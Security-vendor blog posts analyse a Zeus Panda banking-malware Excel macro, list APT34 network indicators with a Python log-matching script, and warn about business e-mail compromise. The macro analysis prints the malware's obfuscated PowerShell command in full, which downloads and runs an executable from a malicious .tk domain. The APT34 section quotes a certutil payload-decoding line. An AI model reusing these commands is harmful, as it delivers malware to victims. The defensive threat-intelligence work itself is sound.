Panda Banker hits Italy – Analysis Part 1

Overview

During the analysis of network traffic collected inside the network of one of our customers by our “Cyber Alastair sensor” system, we identified an HTTP request to a domain that immediately caught our attention: h7de6mkn678k.tk
Further threat intelligence investigation revealed that this domain is strictly related to the infamous Zeus Panda banking malware that has hit Italy in the last few months, as also reported by malwaretraffic back in November.

Zeus Panda is a particularly nasty piece of software, derived from the infamous Zeus trojan, that has hit the news several times this year, as also reported by the guys at phishme.com, since it provides threat actors with many different ways to monetize infected hosts: from stealing bank credentials to keylogging and SOCKS proxy capabilities.

In this series of blog posts we are going to analyze the malware infection in all its stages – from the infection vector to the dissection of the final payload – in order to understand the techniques used to remain a persistent threat inside the system, the methods used to exfiltrate information from the infected machine, the evasion techniques leveraged by the malware to hinder its analysis, and eventually all the IOCs useful for exposing this kind of infection inside your network.

Infection Vector

The infection vector used to deliver this threat is the old school Microsoft Office document containing an embedded VBA macro.
The document arrived attached to a phishing e-mail that tried to persuade the victim that there were debts to pay which needed to be settled urgently; this simple trick is often – unfortunately – enough to exploit the panic/curiosity of the recipient and lead him/her to open the document.

Once the document has been opened we can see this:

The only thing that separates us from the infection is the click on the “Enable Content” button, since VBA macros are not executed automatically by default. Obviously, the document tries to persuade us to click on it by presenting a kind of partial document. This is not one of the most complex phishing techniques we have seen used to fool the victim into enabling the macro code but, hey, it works.

So, long story short: if the victim finally decides that the hidden content of the document is worth his/her click on “Enable Content”, the embedded VBA macro code is executed and the show begins.

Infection Analysis

We can inspect the content of the VBA macro code either statically, with tools like oletools, or dynamically, by actually executing the macro inside the VBA interpreter embedded in Microsoft Office Excel. The latter technique is the one we are going to use here. Let’s disable the network inside our virtual machine – we don’t want to actually download the next stage of the malware now, only analyze the macro code – then click on “Enable Content” and finally open the VBA macro by navigating to View -> Macro -> View Macros -> Edit.

The function Workbook_Open() runs when the Microsoft Excel document opens and passes to the ‘Shell’ command the string returned by the function ‘hawaiii’, which composes the final string by leveraging all the other functions. This kind of simple obfuscation technique is used to bypass automatic analysis systems and possibly AV signatures: instead of hardcoding the malicious command in the macro code, the command is composed with clever tricks. However, in this particular case the obfuscation protecting the malicious command is really basic, so we won’t waste our time analyzing it; instead we will skip all this mess by using a simple and neat dodge to dump the command executed.

We replace the ‘Shell’ command with a strategically placed ‘Debug.Print’ in order to dump the content of the string in our debug console, then we execute the macro and finally obtain our malicious command.

We have a slightly obfuscated PowerShell command here:

poweRSheLL -NoniNTeRaCtivE -NoPr -exeCuTi ByPASS -WinDO hIDDen "do{sleep 15;(.(\"{2}{0}{1}\" -f'-o','bject','new') (\"{1}{3}{5}{0}{2}{4}\" -f't','syst','.webclie','em','nt','.ne')).('d'+'ow'+'nloadfil'+'e').Invoke('https://h7de6mkn678k.tk/trasmetto','%localappdata%.exe')}while(!$?);&(\"{0}{2}{1}\"-f'star','ss','t-proce') '%localappdata%.exe'"

Ah! Here we can see exactly the domain we saw inside our customer’s network.
The PowerShell command sleeps for 15 seconds – yet another technique used to try to time out and bypass security products – and then uses a simple string composition technique (the -f format operator and ‘+’ concatenation) to build the final command, which downloads a file from https://h7de6mkn678k.tk/trasmetto, saves it to %localappdata%.exe – %localappdata% being an alias for %USERPROFILE%\AppData\Local – and eventually executes it.

At the time of writing the C&C at https://h7de6mkn678k.tk/trasmetto no longer serves the second stage; however, we can recover it thanks to a not-so-old analysis of our document on Hybrid Analysis.

From the process tree, we can see our PowerShell command and the execution of the downloaded .exe.

Expanding the window we can retrieve the hash of the downloaded .exe (MD5): 7d898b1260c0ea760c1de7d586cf8527
We can search it on VirusTotal, hoping that somebody uploaded it recently.

Bingo.

This post ends here; in the next one we are going to analyze the second stage of the infection.

Stay tuned and stay safe.

IOC

Document MD5:      6F80250650199B6BF26E9C8022EEB09A
Document Name:     vat.425_info.eu.xls
Domain contacted:  h7de6mkn678k.tk
HTTP Request:      https://h7de6mkn678k.tk/trasmetto
Dropped .exe MD5:  7D898B1260C0EA760C1DE7D586CF8527

APT34 – Cyber Espionage Group

FireEye has recently tracked the activity of an Iranian cyber espionage group, which has been given the name APT 34.

The group, active since 2014, relies on PowerShell backdoors as its main offensive tool. For several years, through spear phishing attacks and the use of compromised accounts, it has targeted organisations in a range of sectors, including government and financial entities as well as industry and telecommunications.

In the most recent malware campaign the attackers exploit the Microsoft Office vulnerability CVE-2017-11882 to execute arbitrary code on vulnerable systems.

As of today, 11/12/2017, the malware staging and C2 servers are still actively distributing the malicious files listed below, which indicates that these campaigns are probably still ongoing.

Below are the network IOCs for spotting any attacks on your own infrastructure related to APT34’s latest malware campaign.

Network IOCs:

Domain / IP Address        Description
hxxp://media-center[.]fun  Malware Staging Server (InTheCyber)
hpserver[.]online          C2
anyportals[.]com           C2
proxycheker[.]pro          C2
hxxp://mumbai-m[.]site     POWRUNER C2
hxxp://dns-update[.]club   Malware Staging Server
94.23.172.164:80           Malware Staging Server
46.105.221.247             Has resolved mumbai-m[.]site & hpserver[.]online
148.251.55.110             Has resolved mumbai-m[.]site and dns-update[.]club
185.15.247.147             Has resolved dns-update[.]club
145.239.33.100             Has resolved dns-update[.]club
82.102.14.219              Has resolved ns2.dns-update[.]club & hpserver[.]online & anyportals[.]com
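As an added example (not code from the original post or from FireEye), a Python matcher that refangs the indicators in the table above and flags DNS, proxy and firewall log lines that reference them; the log lines are constructed, and a domain also matches its subdomains (ns2.dns-update[.]club) but not a longer name that merely contains it.

```python
import re

# The network indicators from the table above, in their defanged form.
APT34_INDICATORS = [
    "hxxp://media-center[.]fun", "hpserver[.]online", "anyportals[.]com",
    "proxycheker[.]pro", "hxxp://mumbai-m[.]site", "hxxp://dns-update[.]club",
    "94.23.172.164:80", "46.105.221.247", "148.251.55.110",
    "185.15.247.147", "145.239.33.100", "82.102.14.219",
]

# Constructed log lines (DNS, proxy, firewall) for the demonstration.
SAMPLE_LOGS = [
    "2017-12-11T09:14:02 dns 10.0.0.15 query ns2.dns-update.club. IN A",
    "2017-12-11T09:14:03 proxy 10.0.0.15 GET http://mumbai-m.site/b.txt 200",
    "2017-12-11T09:15:10 proxy 10.0.0.21 GET http://dns-update.club.example.com/ 200",
    "2017-12-11T09:16:44 fw allow 10.0.0.15 -> 94.23.172.164:80 tcp",
    "2017-12-11T09:17:00 fw allow 10.0.0.33 -> 194.23.172.164:443 tcp",
]

def refang(ioc):
    """hxxp://mumbai-m[.]site -> mumbai-m.site ; 94.23.172.164:80 -> 94.23.172.164"""
    s = re.sub(r"^hxxps?://", "", ioc).replace("[.]", ".")
    return s.split("/")[0].split(":")[0].lower()

def is_ip(s):
    return re.fullmatch(r"\d{1,3}(?:\.\d{1,3}){3}", s) is not None

def build_matcher(indicators):
    """Return match(line) -> sorted list of the indicators the line touches."""
    bare = {refang(i) for i in indicators}
    domains = sorted(d for d in bare if not is_ip(d))
    ips = sorted(i for i in bare if is_ip(i))
    # A domain hits on itself or any subdomain (ns2.dns-update.club, with or
    # without a trailing dot) but not inside a longer label or longer name.
    dom_re = re.compile(r"(?<![\w-])(?:[\w-]+\.)*(" + "|".join(map(re.escape, domains)) + r")(?!\.?[\w-])")
    ip_re = re.compile(r"(?<![\d.])(" + "|".join(map(re.escape, ips)) + r")(?![\d.])")
    def match(line):
        low = line.lower()
        hits = {m.group(1) for m in dom_re.finditer(low)}
        hits |= {m.group(1) for m in ip_re.finditer(low)}
        return sorted(hits)
    return match

def scan_logs(lines, indicators=APT34_INDICATORS):
    """Return (line, hits) for every line that references at least one indicator."""
    match = build_matcher(indicators)
    return [(line, match(line)) for line in lines if match(line)]

if __name__ == "__main__":
    for line, hits in scan_logs(SAMPLE_LOGS):
        print(", ".join(hits), "<-", line)
```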

Technical overview:

The initial infection occurs when the victim opens a document with the “.rtf” extension containing the exploit for the latest Microsoft Office vulnerability, identified as CVE-2017-11882. This vulnerability lies in the component used to insert and evaluate mathematical formulas, Equation Editor (EQNEDT32.EXE).

Further information: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11882

After the code is executed, the “mshta.exe” process is invoked, which in turn downloads and runs the malicious scripts fetched from the website “hxxp://mumbai-m[.]site/b.txt”.

POWRUNER Attack Sequence

The “b.txt” script contains PowerShell commands that download a further script from “hxxp://dns-update[.]club/v.txt”, which is renamed from “v.txt” to “v.vbs”.

At this point, the “v.vbs” script places 4 components in the directory “C:\ProgramData\Windows\Microsoft\java\” (hUpdateCheckers.base, dUpdateCheckers.base, cUpdateCheckers.bat and GoogleUpdateschecker.vbs).

Using the Microsoft tool “CertUtil.exe”, “v.vbs” decodes the components above, dropping the scripts “hUpdateCheckers.ps1” and “dUpdateCheckers.ps1”:

oShell.run "cmd.exe /C certutil -f  -decode C:\ProgramData\Windows\Microsoft\java\dUpdateCheckers.base C:\ProgramData\Windows\Microsoft\java\dUpdateCheckers.ps1", 0,false

To achieve persistence on the affected system, a Scheduled Task is created for “GoogleUpdateschecker.vbs”, run every 60 seconds, which uses the files “dUpdateCheckers.ps1” and “hUpdateCheckers.ps1” for the remote control functionality (also using a DGA to communicate with the Command and Control servers).

InTheCyber Analysis:

Thanks to the information shared by FireEye, InTheCyber has started analyses and checks on the infrastructures it defends and on the attackers’ systems.

It was possible to identify additional PowerShell scripts, from which a further malicious domain used in the staging phase of the infection was extracted (hxxp://media-center[.]fun).

Analyses are still ongoing, with particular attention to possible attacks against Italian infrastructure.

New Threat – Business E-Mail Compromise

During its research and Incident Response activities, InTheCyber’s CyberSecurity Center has observed an increase in “Business E-Mail Compromise” attacks (also known as “CEO fraud”), in which the fraudsters, after stealing e-mail credentials through phishing attacks, send requests to change bank details to the customers or suppliers of the affected company, attempting to divert sums of money to foreign bank accounts.

InTheCyber has tracked the movements of a criminal group that has targeted several companies, in particular businesses in Europe and China.

Modus Operandi:

The group sends phishing e-mails from an IP address in Georgia, spoofing the sender, with attachments renamed:

  • %Random%.pdf.html
  • %Random%.xlsx.htm

Indicators of Compromise (IOC):
The credentials captured in this way are sent to a “.php” page hosted on the website:

  • microsoftexcelsyn . 000webhostapp . com

Warning: access to this domain indicates the probable compromise of the account

ITC recommends:

  • checking for accesses to the website “microsoftexcelsyn…”

If positive:

  • reset the mailbox password of the users involved
  • identify the malicious e-mail and attachment
  • clean up the affected workstation
  • contact the exposed customers/suppliers to raise awareness

InTheCyber is currently cooperating with the relevant authorities.

For support, please contact: blueteam[at]inthecyber.com